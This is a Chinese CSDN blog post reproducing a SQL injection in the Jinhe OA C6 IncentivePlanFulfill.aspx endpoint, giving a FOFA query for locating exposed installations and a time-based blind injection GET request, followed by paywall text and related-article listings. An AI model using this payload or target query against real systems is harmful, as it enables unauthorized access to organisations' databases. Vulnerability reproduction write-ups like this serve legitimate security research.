【漏洞复现】金和OA IncentivePlanFulfill.aspx SQL注入漏洞

最新推荐文章于 2024-11-06 20:27:04 发布

从不学安全

最新推荐文章于 2024-11-06 20:27:04 发布

阅读量519

点赞数 4

分类专栏：漏洞复现文章标签： php 网络安全

本文链接：https://blog.csdn.net/qq_67810151/article/details/136947141

版权

漏洞复现专栏收录该内容

99 篇文章 35 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了金和OA协同办公管理系统C6中的一个SQL注入漏洞，详细阐述了漏洞概述，测绘语句，并通过0x04章节的漏洞复现步骤展示了该漏洞的影响范围，提醒用户关注网络安全。

摘要由CSDN通过智能技术生成

0x01 产品简介

金和OA协同办公管理系统C6软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。

0x02 漏洞概述

金和OA协同办公管理系统C6软件 IncentivePlanFulfill.aspx 接口存在SQL注入漏洞，攻击者可以通过该漏洞执行任意sql语句。

0x03 测绘语句

fofa: app="金和网络-金和OA"

0x04 漏洞复现

GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1WAITFOR+DELAY+%270:0:3%27--&TVersion=1 HTTP/1.1

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

4
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

金和OA C6 IncentivePlanFulfill.aspx SQL注入漏洞复现

qq_39894062的博客

03-27

【漏洞复现】金和OA-C6-incentiveplanfulfill-sql注入

知黑而守白

03-20

175

金和OA协同办公管理系统软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。金和OA协同办公管理系统 incentiveplanfulfill 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

参与评论您还未登录，请先登录后发表或查看评论

漏洞复现--金和OA clobfield SQL注入

qq_53003652的博客

12-19

814

金和OA协同办公管理系统C6软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。该产品存在SQL注入漏洞。

【漏洞复现】金和OA C6 GetMaxIndex接口SQL注入漏洞

sugxvxuysv的博客

01-25

324

金和OA C6 GetMaxIndex接口处存在SQL注入漏洞，攻击者不仅可以利用 SQL 注入漏洞获取数据库中的敏感信息，还可以向服务器中写入恶意木马或者执行命令远程下载后门，获取服务器系统权限。

「漏洞复现」金和OA C6 DBModules.aspx SQL注入漏洞

qq_39894062的博客

08-24

459

金和OA DBModules.aspx SQL注入漏洞

weixin_43167326的博客

08-23

708

金和OA-C6协同管理平台DBModules.aspx接口处存在SQL注入，攻击者可通过该漏洞进行sql操作。

金和OA GetTreeDate.aspx SQL注入漏洞

xiaokp7的博客

09-22

636

金和OA协同办公管理系统C6软件共有20多个应用模块，160多个应用子模块，涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围，从功能型的协同办公平台上升到管理型协同管理平台，并不断的更新完善，全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞。

【漏洞复现】金和OA C6 GeneralXmlhttpPage.aspx Sql注入漏洞

alert['Hello World']

09-28

345

金和OA C6 GeneralXmlhttpPage.aspx 接口存在SQL注入漏洞，攻击者通过漏洞可以获取服务器数据库权限

金和OA C6 DBModules.aspx SQL注入漏洞复现

0xSec

08-23

536

金和OA C6 DBModules.aspx 接口处存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

嵌入式学习-网络高级-Day01

最新发布

Xiaomo1536的博客

11-06

734

对于读数据以及写单个来说，在主机询问报文里面报文头中字节长度固定，都是0x0006，（1个字节的单元标识符，1个字节功能码，2个字节的地址，2个字节的数据）输入寄存器，这个和保持寄存器类似，但是也是只支持读而不能写。报文头------功能码-------起始地址-------数量--------字节计数--------数据。报文头（字节长度可能发生变化）------功能码------字节计数-------数据。报文头------功能码-------地址-------数据/断通标志（2个字节）

PHP-FPM 性能配置优化

陈万洲的专栏

11-05

759

FastCGI 是的简称，是一种交互程序（此处是 PHP）与 Web 服务器之间的通信协议。FastCGI 是早期通用网关接口（CGI）的增强版本。注意 FastCGI 和 CGI 都是一种通信协议，独立于任何语言。Web 服务器无须对语言有任何了解。除 PHP 有 php-fpm 外，像 Python, Ruby, Perl, Tcl, C/C++, 和 Visual Basic 都有其各自的 CGI 和 FastCGI 实现。

黑客扫描全网 Git 配置文件并窃取大量云凭据

分享web安全、AI安全、云安全、业务安全、渗透测试、安全开发、安全工具、行业动态等优质内容……

11-01

1429

Sysdig 表示，在 Telegram 上，仅指向公开的 Git 配置文件的 URL 列表就以 100 美元左右的价格出售，那些实际去利用的人可能会赚取到更多的钱。攻击者使用暴露的电子邮件平台身份验证令牌来开展垃圾邮件和网络钓鱼活动。在公开的 URL 中，有 28,000 个对应于 Git 存储库，6,000 个是 GitHub 令牌，值得注意的是，有 2,000 个被验证为有效凭证。Sysdig 表示，黑客甚至创建了文件，列出了所有可能的 IPv4 地址，包含超过 42 亿个目标，以方便未来的扫描。

微信小程序寓言童话创作APP设计与实现

qq2295116502的博客

11-05

476

本文通过对现有寓言童话创作APP的调研和分析，取其精华去其糟粕，遵循软件工程方法进行系统分析、总体设计和详细设计，最终设计开发基于Android的寓言童话创作APP。本系统分为管理员、作者、用户三种用户。管理员用户可以通过本系统进行寓言童话管理、用户管理、审批作品管理。用户可以通过本系统进行题目的查询、登录、阅读寓言童话等内容。1.系统登录登录过程是通过web服务器，在后台的数据库通过用户名称密码进行査询。有该注册用户方可使用该系统。2.信息查询。

Automattic 和 Matt Mullenweg 要求驳回 WP Engine 诉讼案中的关键索赔

WP站长

11-03

1037

Automattic 和 Matt Mullenweg 已提交回应，要求法院驳回 WP Engine 诉讼中的第 1-6 项和第 9-11 项指控。WP Engine 于 2024 年 10 月 18 日向北加州法院提交了一份动议，要求获得初步禁令，寻求恢复对 WordPress.org 的访问，并恢复到 2024 年 9 月 20 日的状态。作为回应，Automattic 提交了三份关键文件：驳回 WP Engine 投诉的动议、撤销动议以及反对 WP Engine 初步禁令的动议。

信息学科平台系统设计与实现：Spring Boot框架

2401_85812053的博客

11-02

656

1系统概述 1.1 研究背景随着计算机技术的发展以及计算机网络的逐渐普及，互联网成为人们查找信息的重要场所，二十一世纪是信息的时代，所以信息的管理显得特别重要。因此，使用计算机来管理基于保密信息学科平台系统的相关信息成为必然。开发合适的基于保密信息学科平台系统，可以方便管理人员对基于保密信息学科平台系统的管理，提高信息管理工作效率及查询效率，有利于更好的为人们服务。 1.2研究目的随着互联网技术的快速发展，网络时代的到来，网络信息也将会改变当今社会。各行各业在日常企业经营管理等方面也在慢慢的向规范化和网

【无标题】

m0_52150489的博客

11-03

258

【代码】【无标题】

基于PHP的设云尘资讯网站设计与实现

程序猿麦小七

11-04

403

本系统设计是基于PHP的信息资讯网站的设计与实现，可以提供给用户便捷的平台。用PHP主流技术建设云尘资讯网站实现信息化的传播，采用THML以及CSS样式建立WEB网页，使得用户访问前端页面优美丰富，能够分享社会事迹、娱乐资讯、科学探究以及搞笑趣事等信息，充分的发挥现在信息化技术的优势，提供给用户闲暇时的阅读和了解，简单快速的获取自己想要的信息。使用到的工具和技术都是开源免费的。首页、登录注册、失物找寻、社会纪实、搞笑专栏、娱乐资讯、科学探究。网站首页、网站管理、内容管理、扩展管理、模板插件、系统管理。

n1book web1信息收集

shierbai的博客

11-03

248

2..index.php.swp这样的会触发下载，需要使用vim -r index.php.swp去做修复才能看。可以使用dirsearch的--delay n和-t n控制延时和线程数量避免429。访问robots.txt，访问里面给出的接口拿到第一部分flag。最后使用curl -o 1.swp xxxxxx（靶场url）1.使用目录扫描工具会遇到429请求过多。再vim -r 1.swp得到第三段。访问index.php~得到第二段。使用dirsearch扫描。

金和oa jc6 ntko-upload 任意文件上传漏洞

01-16

金和OA JC6是一套企业办公协同软件，用于企业内部的办公流程管理与协同办公。而NTKO-Upload是金和OA JC6中的一个模块，用于用户在办公过程中上传文件进行共享和交流。然而，金和OA JC6和NTKO-Upload存在一个任意文件上传漏洞。该漏洞可能会被恶意攻击者利用，上传恶意文件，从而对系统造成潜在的安全风险。恶意上传的文件可能包含恶意代码、病毒或其他有害的文件，攻击者可通过这些文件获取系统权限、窃取敏感信息、篡改数据等。由于金和OA JC6广泛应用于企业内部，一旦该漏洞被利用，可能会对企业的信息安全带来严重威胁。为了防止利用这个漏洞进行任意文件上传的攻击，建议用户采取以下措施： 1. 及时升级金和OA JC6和NTKO-Upload软件，确保软件的最新版本中修复了该漏洞。 2. 对金和OA JC6和NTKO-Upload进行适当的安全配置，禁用或限制用户上传的文件类型和大小，只允许上传安全可信的文件。 3. 定期进行系统漏洞扫描和安全评估，及时发现并修复可能存在的漏洞。 4. 配置防火墙和入侵检测系统，及时发现和阻止恶意上传行为。 5. 培训企业员工，提高其安全意识，警惕不明文件的上传和下载。总之，任意文件上传漏洞对金和OA JC6和NTKO-Upload的安全构成潜在威胁，为保护企业信息安全，必须采取相应的安全防护措施，并保持软件的更新和维护。